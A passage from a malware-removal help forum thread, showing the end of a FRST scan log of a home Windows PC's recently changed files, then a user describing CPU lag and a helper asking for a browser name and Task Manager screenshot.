2014-10-15 23:10 - 2014-07-11 21:41 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00008192 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRUM.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-15 23:10 - 2014-07-11 21:15 - 00006144 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-15 23:10 - 2014-07-08 15:33 - 00181248 _____ (Microsoft Corp.) C:\windows\system32\Defrag.exe
2014-10-15 23:09 - 2014-09-19 22:18 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-15 23:09 - 2014-09-19 22:17 - 02236928 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-15 23:09 - 2014-09-19 22:17 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-15 23:09 - 2014-09-19 22:17 - 00915968 _____ (Microsoft Corporation) C:\windows\system32\uxtheme.dll
2014-10-15 23:09 - 2014-09-19 22:17 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\UXInit.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 19280896 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-15 23:09 - 2014-09-19 22:15 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-15 23:09 - 2014-09-19 22:15 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-15 23:09 - 2014-09-19 22:15 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 14368768 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 13757952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 01762816 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00044032 _____ (Microsoft Corporation) C:\windows\SysWOW64\UXInit.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00039936 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-15 23:09 - 2014-09-19 20:56 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-15 23:09 - 2014-09-19 20:56 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-15 23:09 - 2014-09-19 20:56 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-15 23:09 - 2014-09-19 20:38 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-15 23:09 - 2014-09-19 20:33 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-15 23:09 - 2014-09-19 18:06 - 00534528 _____ (Microsoft Corporation) C:\windows\SysWOW64\uxtheme.dll
2014-10-15 23:09 - 2014-08-01 15:08 - 00388729 _____ () C:\windows\system32\ApnDatabase.xml
2014-10-15 23:09 - 2014-07-24 06:50 - 00447296 _____ (Microsoft Corporation) C:\windows\system32\Drivers\USBHUB3.SYS
2014-10-15 23:09 - 2014-07-16 16:28 - 00027648 _____ (Microsoft Corporation) C:\windows\SysWOW64\sscore.dll
2014-10-15 23:09 - 2014-07-16 15:59 - 00305664 _____ (Microsoft Corporation) C:\windows\system32\srvsvc.dll
2014-10-15 23:09 - 2014-07-16 15:59 - 00035840 _____ (Microsoft Corporation) C:\windows\system32\sscore.dll
2014-10-15 23:09 - 2014-07-11 23:45 - 01549824 _____ (Microsoft Corporation) C:\windows\system32\msdtctm.dll
2014-10-15 23:09 - 2014-07-11 21:36 - 00674304 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srv2.sys
2014-10-15 23:09 - 2014-07-11 21:36 - 00211456 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb20.sys
2014-10-15 23:09 - 2014-07-11 21:34 - 00404480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb.sys
2014-10-15 23:09 - 2014-07-11 21:34 - 00250368 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srvnet.sys
2014-10-15 23:09 - 2014-06-27 23:57 - 01341952 _____ (Microsoft Corporation) C:\windows\system32\user32.dll
2014-10-15 23:09 - 2014-06-27 19:23 - 01126400 _____ (Microsoft Corporation) C:\windows\SysWOW64\user32.dll
2014-10-15 23:08 - 2014-09-27 21:18 - 04068352 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-15 23:08 - 2014-08-29 22:48 - 10115072 _____ (Microsoft Corporation) C:\windows\system32\twinui.dll
2014-10-15 23:08 - 2014-08-29 22:47 - 02885632 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-15 23:08 - 2014-08-29 22:46 - 02306560 _____ (Microsoft Corporation) C:\windows\system32\authui.dll
2014-10-15 23:08 - 2014-08-29 21:05 - 08858112 _____ (Microsoft Corporation) C:\windows\SysWOW64\twinui.dll
2014-10-15 23:08 - 2014-08-29 21:04 - 02416128 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-15 23:08 - 2014-08-29 21:03 - 02037760 _____ (Microsoft Corporation) C:\windows\SysWOW64\authui.dll
2014-10-15 23:08 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\windows\SysWOW64\actxprxy.dll
2014-10-15 23:08 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\windows\system32\actxprxy.dll
2014-10-15 08:26 - 2014-10-15 08:27 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\CutePDF Writer
2014-10-14 20:45 - 2014-10-14 20:45 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\tdsskiller
2014-10-14 19:31 - 2014-10-14 19:34 - 00060245 _____ () C:\Users\Jeremy and Heidi\Downloads\Addition.txt
2014-10-14 19:30 - 2014-11-01 08:57 - 00014613 _____ () C:\Users\Jeremy and Heidi\Downloads\FRST.txt
2014-10-14 19:29 - 2014-11-01 08:57 - 02114048 _____ (Farbar) C:\Users\Jeremy and Heidi\Downloads\FRST64.exe
2014-10-14 12:37 - 2014-11-01 08:57 - 00000000 ____D () C:\FRST
2014-10-14 12:30 - 2014-10-14 12:32 - 04161313 _____ () C:\Users\Jeremy and Heidi\Desktop\tdsskiller.zip
2014-10-14 12:27 - 2014-10-14 12:28 - 00380416 _____ () C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe
2014-10-13 10:48 - 2014-10-27 15:53 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-13 10:44 - 2014-10-20 10:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-10-20 10:13 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-10-13 10:44 - 00001156 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-13 10:44 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-13 10:44 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-13 10:44 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-10-13 10:24 - 2014-10-13 10:25 - 00688992 ____R (Swearware) C:\Users\Jeremy and Heidi\Desktop\dds.com
2014-10-11 22:37 - 2014-10-11 22:37 - 00401920 _____ (Farbar) C:\Users\Jeremy and Heidi\Desktop\MiniToolBox.exe
2014-10-11 22:18 - 2014-10-11 22:18 - 00281280 _____ () C:\windows\Minidump\101114-49483-01.dmp
2014-10-10 08:22 - 2014-10-10 08:22 - 00000000 ____D () C:\Program Files (x86)\GPLGS
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CutePDF
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\APN
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\Program Files (x86)\Acro Software
2014-10-10 08:21 - 2014-03-05 16:31 - 00489392 _____ (Ask Partner Network) C:\Users\Jeremy and Heidi\Documents\APNSetup1.exe
2014-10-10 08:21 - 2013-10-23 14:24 - 00087600 _____ () C:\windows\system32\cpwmon64.dll
2014-10-10 08:19 - 2014-10-10 08:19 - 05254656 _____ () C:\Users\Jeremy and Heidi\Downloads\converter.exe
2014-10-10 08:19 - 2014-10-10 08:19 - 02003352 _____ (Acro Software Inc. ) C:\Users\Jeremy and Heidi\Downloads\CuteWriter.exe
2014-10-09 09:55 - 2014-10-09 09:56 - 118744568 _____ () C:\Users\Jeremy and Heidi\Downloads\OJ6600_1315-1.exe
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Hewlett-Packard
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Program Files (x86)\Hewlett-Packard
2014-10-09 09:52 - 2014-10-09 09:53 - 05152768 _____ () C:\Users\Jeremy and Heidi\Downloads\HPSupportSolutionsFramework-11.51.0027.msi
2014-10-07 08:10 - 2014-10-07 08:10 - 00417918 _____ () C:\Users\Jeremy and Heidi\Downloads\Better-Dungeons-Mod-1.7.10.zip
2014-10-03 18:43 - 2014-10-03 18:43 - 00178800 _____ (Sony DADC Austria AG.) C:\windows\SysWOW64\CmdLineExt_x64.dll
2014-10-02 19:14 - 2014-10-02 19:14 - 00000000 ____D () C:\ProgramData\Emsisoft
2014-10-02 12:16 - 2014-11-01 08:06 - 00000000 ____D () C:\Program Files (x86)\Emsisoft Anti-Malware
2014-10-02 12:16 - 2014-10-02 12:16 - 00001145 _____ () C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2014-10-02 12:16 - 2014-10-02 12:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2014-10-02 12:11 - 2014-10-02 12:15 - 233663808 _____ (Emsisoft GmbH ) C:\Users\Jeremy and Heidi\Desktop\EmsisoftAntiMalwareSetup.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 08:55 - 2012-08-18 04:55 - 00001107 _____ () C:\Users\Public\Desktop\Desktop Assist.lnk
2014-11-01 08:00 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\sru
2014-11-01 05:39 - 2012-12-18 23:25 - 01684308 _____ () C:\windows\WindowsUpdate.log
2014-11-01 03:45 - 2012-12-21 22:45 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-31 16:49 - 2014-08-14 16:49 - 00000388 _____ () C:\windows\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi).job
2014-10-30 22:23 - 2012-07-26 00:22 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-30 22:19 - 2012-12-23 08:59 - 00000000 ____D () C:\ProgramData\pdf995
2014-10-30 22:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-30 22:19 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Common Files\microsoft shared
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\windows\ToastData
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\WinStore
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\rescache
2014-10-30 22:18 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\Sysprep
2014-10-30 22:17 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\registration
2014-10-30 17:01 - 2014-09-28 12:39 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\.minecraft
2014-10-30 16:44 - 2014-09-19 20:25 - 00000648 _____ () C:\Users\Jeremy and Heidi\Downloads\server.properties
2014-10-30 16:44 - 2014-09-19 20:25 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\ops.json
2014-10-30 16:44 - 2014-09-19 20:25 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-players.json
2014-10-30 16:44 - 2014-09-19 20:25 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-ips.json
2014-10-30 16:44 - 2014-08-23 21:16 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\usercache.json
2014-10-30 16:44 - 2014-08-23 21:16 - 00000000 ____D () C:\Users\Jeremy and Heidi\Downloads\world
2014-10-30 16:44 - 2012-08-18 04:22 - 00000000 ____D () C:\ProgramData\Origin
2014-10-30 16:43 - 2012-08-18 04:21 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-10-30 16:13 - 2012-07-25 22:26 - 00524288 ___SH () C:\windows\system32\config\BBI
2014-10-30 16:08 - 2012-07-26 00:59 - 00000000 ____D () C:\windows\CbsTemp
2014-10-30 16:03 - 2014-08-08 20:59 - 00000000 ____D () C:\windows\system32\MRT
2014-10-30 15:58 - 2012-12-24 03:02 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-29 08:53 - 2012-08-18 04:10 - 01144108 _____ () C:\windows\PFRO.log
2014-10-28 12:02 - 2014-07-12 10:50 - 00140288 ___SH () C:\Users\Jeremy and Heidi\Downloads\Thumbs.db
2014-10-27 21:50 - 2012-07-26 00:28 - 00848230 _____ () C:\windows\system32\PerfStringBackup.INI
2014-10-27 14:31 - 2012-12-21 19:38 - 00003600 _____ () C:\windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3754358886-4043612072-4009104627-1001
2014-10-27 11:15 - 2014-08-28 13:01 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-26 15:46 - 2012-07-25 22:26 - 00262144 ___SH () C:\windows\system32\config\ELAM
2014-10-25 12:50 - 2012-12-23 18:00 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\CrashDumps
2014-10-24 14:02 - 2012-12-18 23:25 - 00000000 ___HD () C:\Users\Jeremy and Heidi
2014-10-23 13:24 - 2012-12-23 23:14 - 00000000 ____D () C:\windows\Minidump
2014-10-21 18:56 - 2014-07-28 08:06 - 00000000 ____D () C:\ProgramData\AVG2014
2014-10-21 18:46 - 2012-12-21 22:53 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 18:45 - 2014-06-17 08:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 18:45 - 2012-12-21 22:53 - 00000000 ___HD () C:\$AVG
2014-10-21 18:44 - 2014-09-07 18:59 - 00001392 _____ () C:\Users\Public\Desktop\The Sims 4.lnk
2014-10-16 21:53 - 2012-12-23 08:59 - 00000060 _____ () C:\windows\wpd99.drv
2014-10-14 12:22 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\AUInstallAgent
2014-10-13 12:41 - 2014-09-15 17:17 - 00000000 ____D () C:\windows\ERUNT
2014-10-13 10:41 - 2013-03-08 17:40 - 00098304 ___SH () C:\Users\Jeremy and Heidi\Desktop\Thumbs.db
2014-10-11 22:18 - 2012-12-23 23:12 - 595965047 _____ () C:\windows\MEMORY.DMP
2014-10-10 10:15 - 2014-02-25 19:59 - 00007592 _____ () C:\Users\Jeremy and Heidi\AppData\Local\Resmon.ResmonCfg
2014-10-09 09:55 - 2013-04-19 21:43 - 00000000 ____D () C:\Program Files (x86)\HP
2014-10-06 19:33 - 2012-07-26 00:21 - 00054557 _____ () C:\windows\setupact.log
2014-10-06 15:33 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\SecureBootUpdates
2014-10-02 19:57 - 2014-05-05 10:20 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager

Files to move or delete:
====================
C:\Users\Jeremy and Heidi\o2ik1mvb.exe


Some content of TEMP:
====================
C:\Users\Jeremy and Heidi\AppData\Local\Temp\pylCCED.tmp.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 03:00

==================== End Of Log ============================

 Thanks for looking at this.



#14 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 01 November 2014 - 11:11 AM

I do get an extreme lag when first opening a webpage, it goes to 100% CPU use, but not on IE, usually on Task Mgr, Microsoft indexing and service host (network).  I just experienced it when I posted the last, that's what made me do this second post.



#15 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:01:47 AM

Posted 01 November 2014 - 12:09 PM

Which browser do you use when you have this lag?
 

 

t goes to 100% CPU use, but not on IE, usually on Task Mgr, Microsoft indexing and service host (network).  I just experienced it when I posted the last, that's what made me do this second post.

Please show me a screenshot from the task manager.


regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users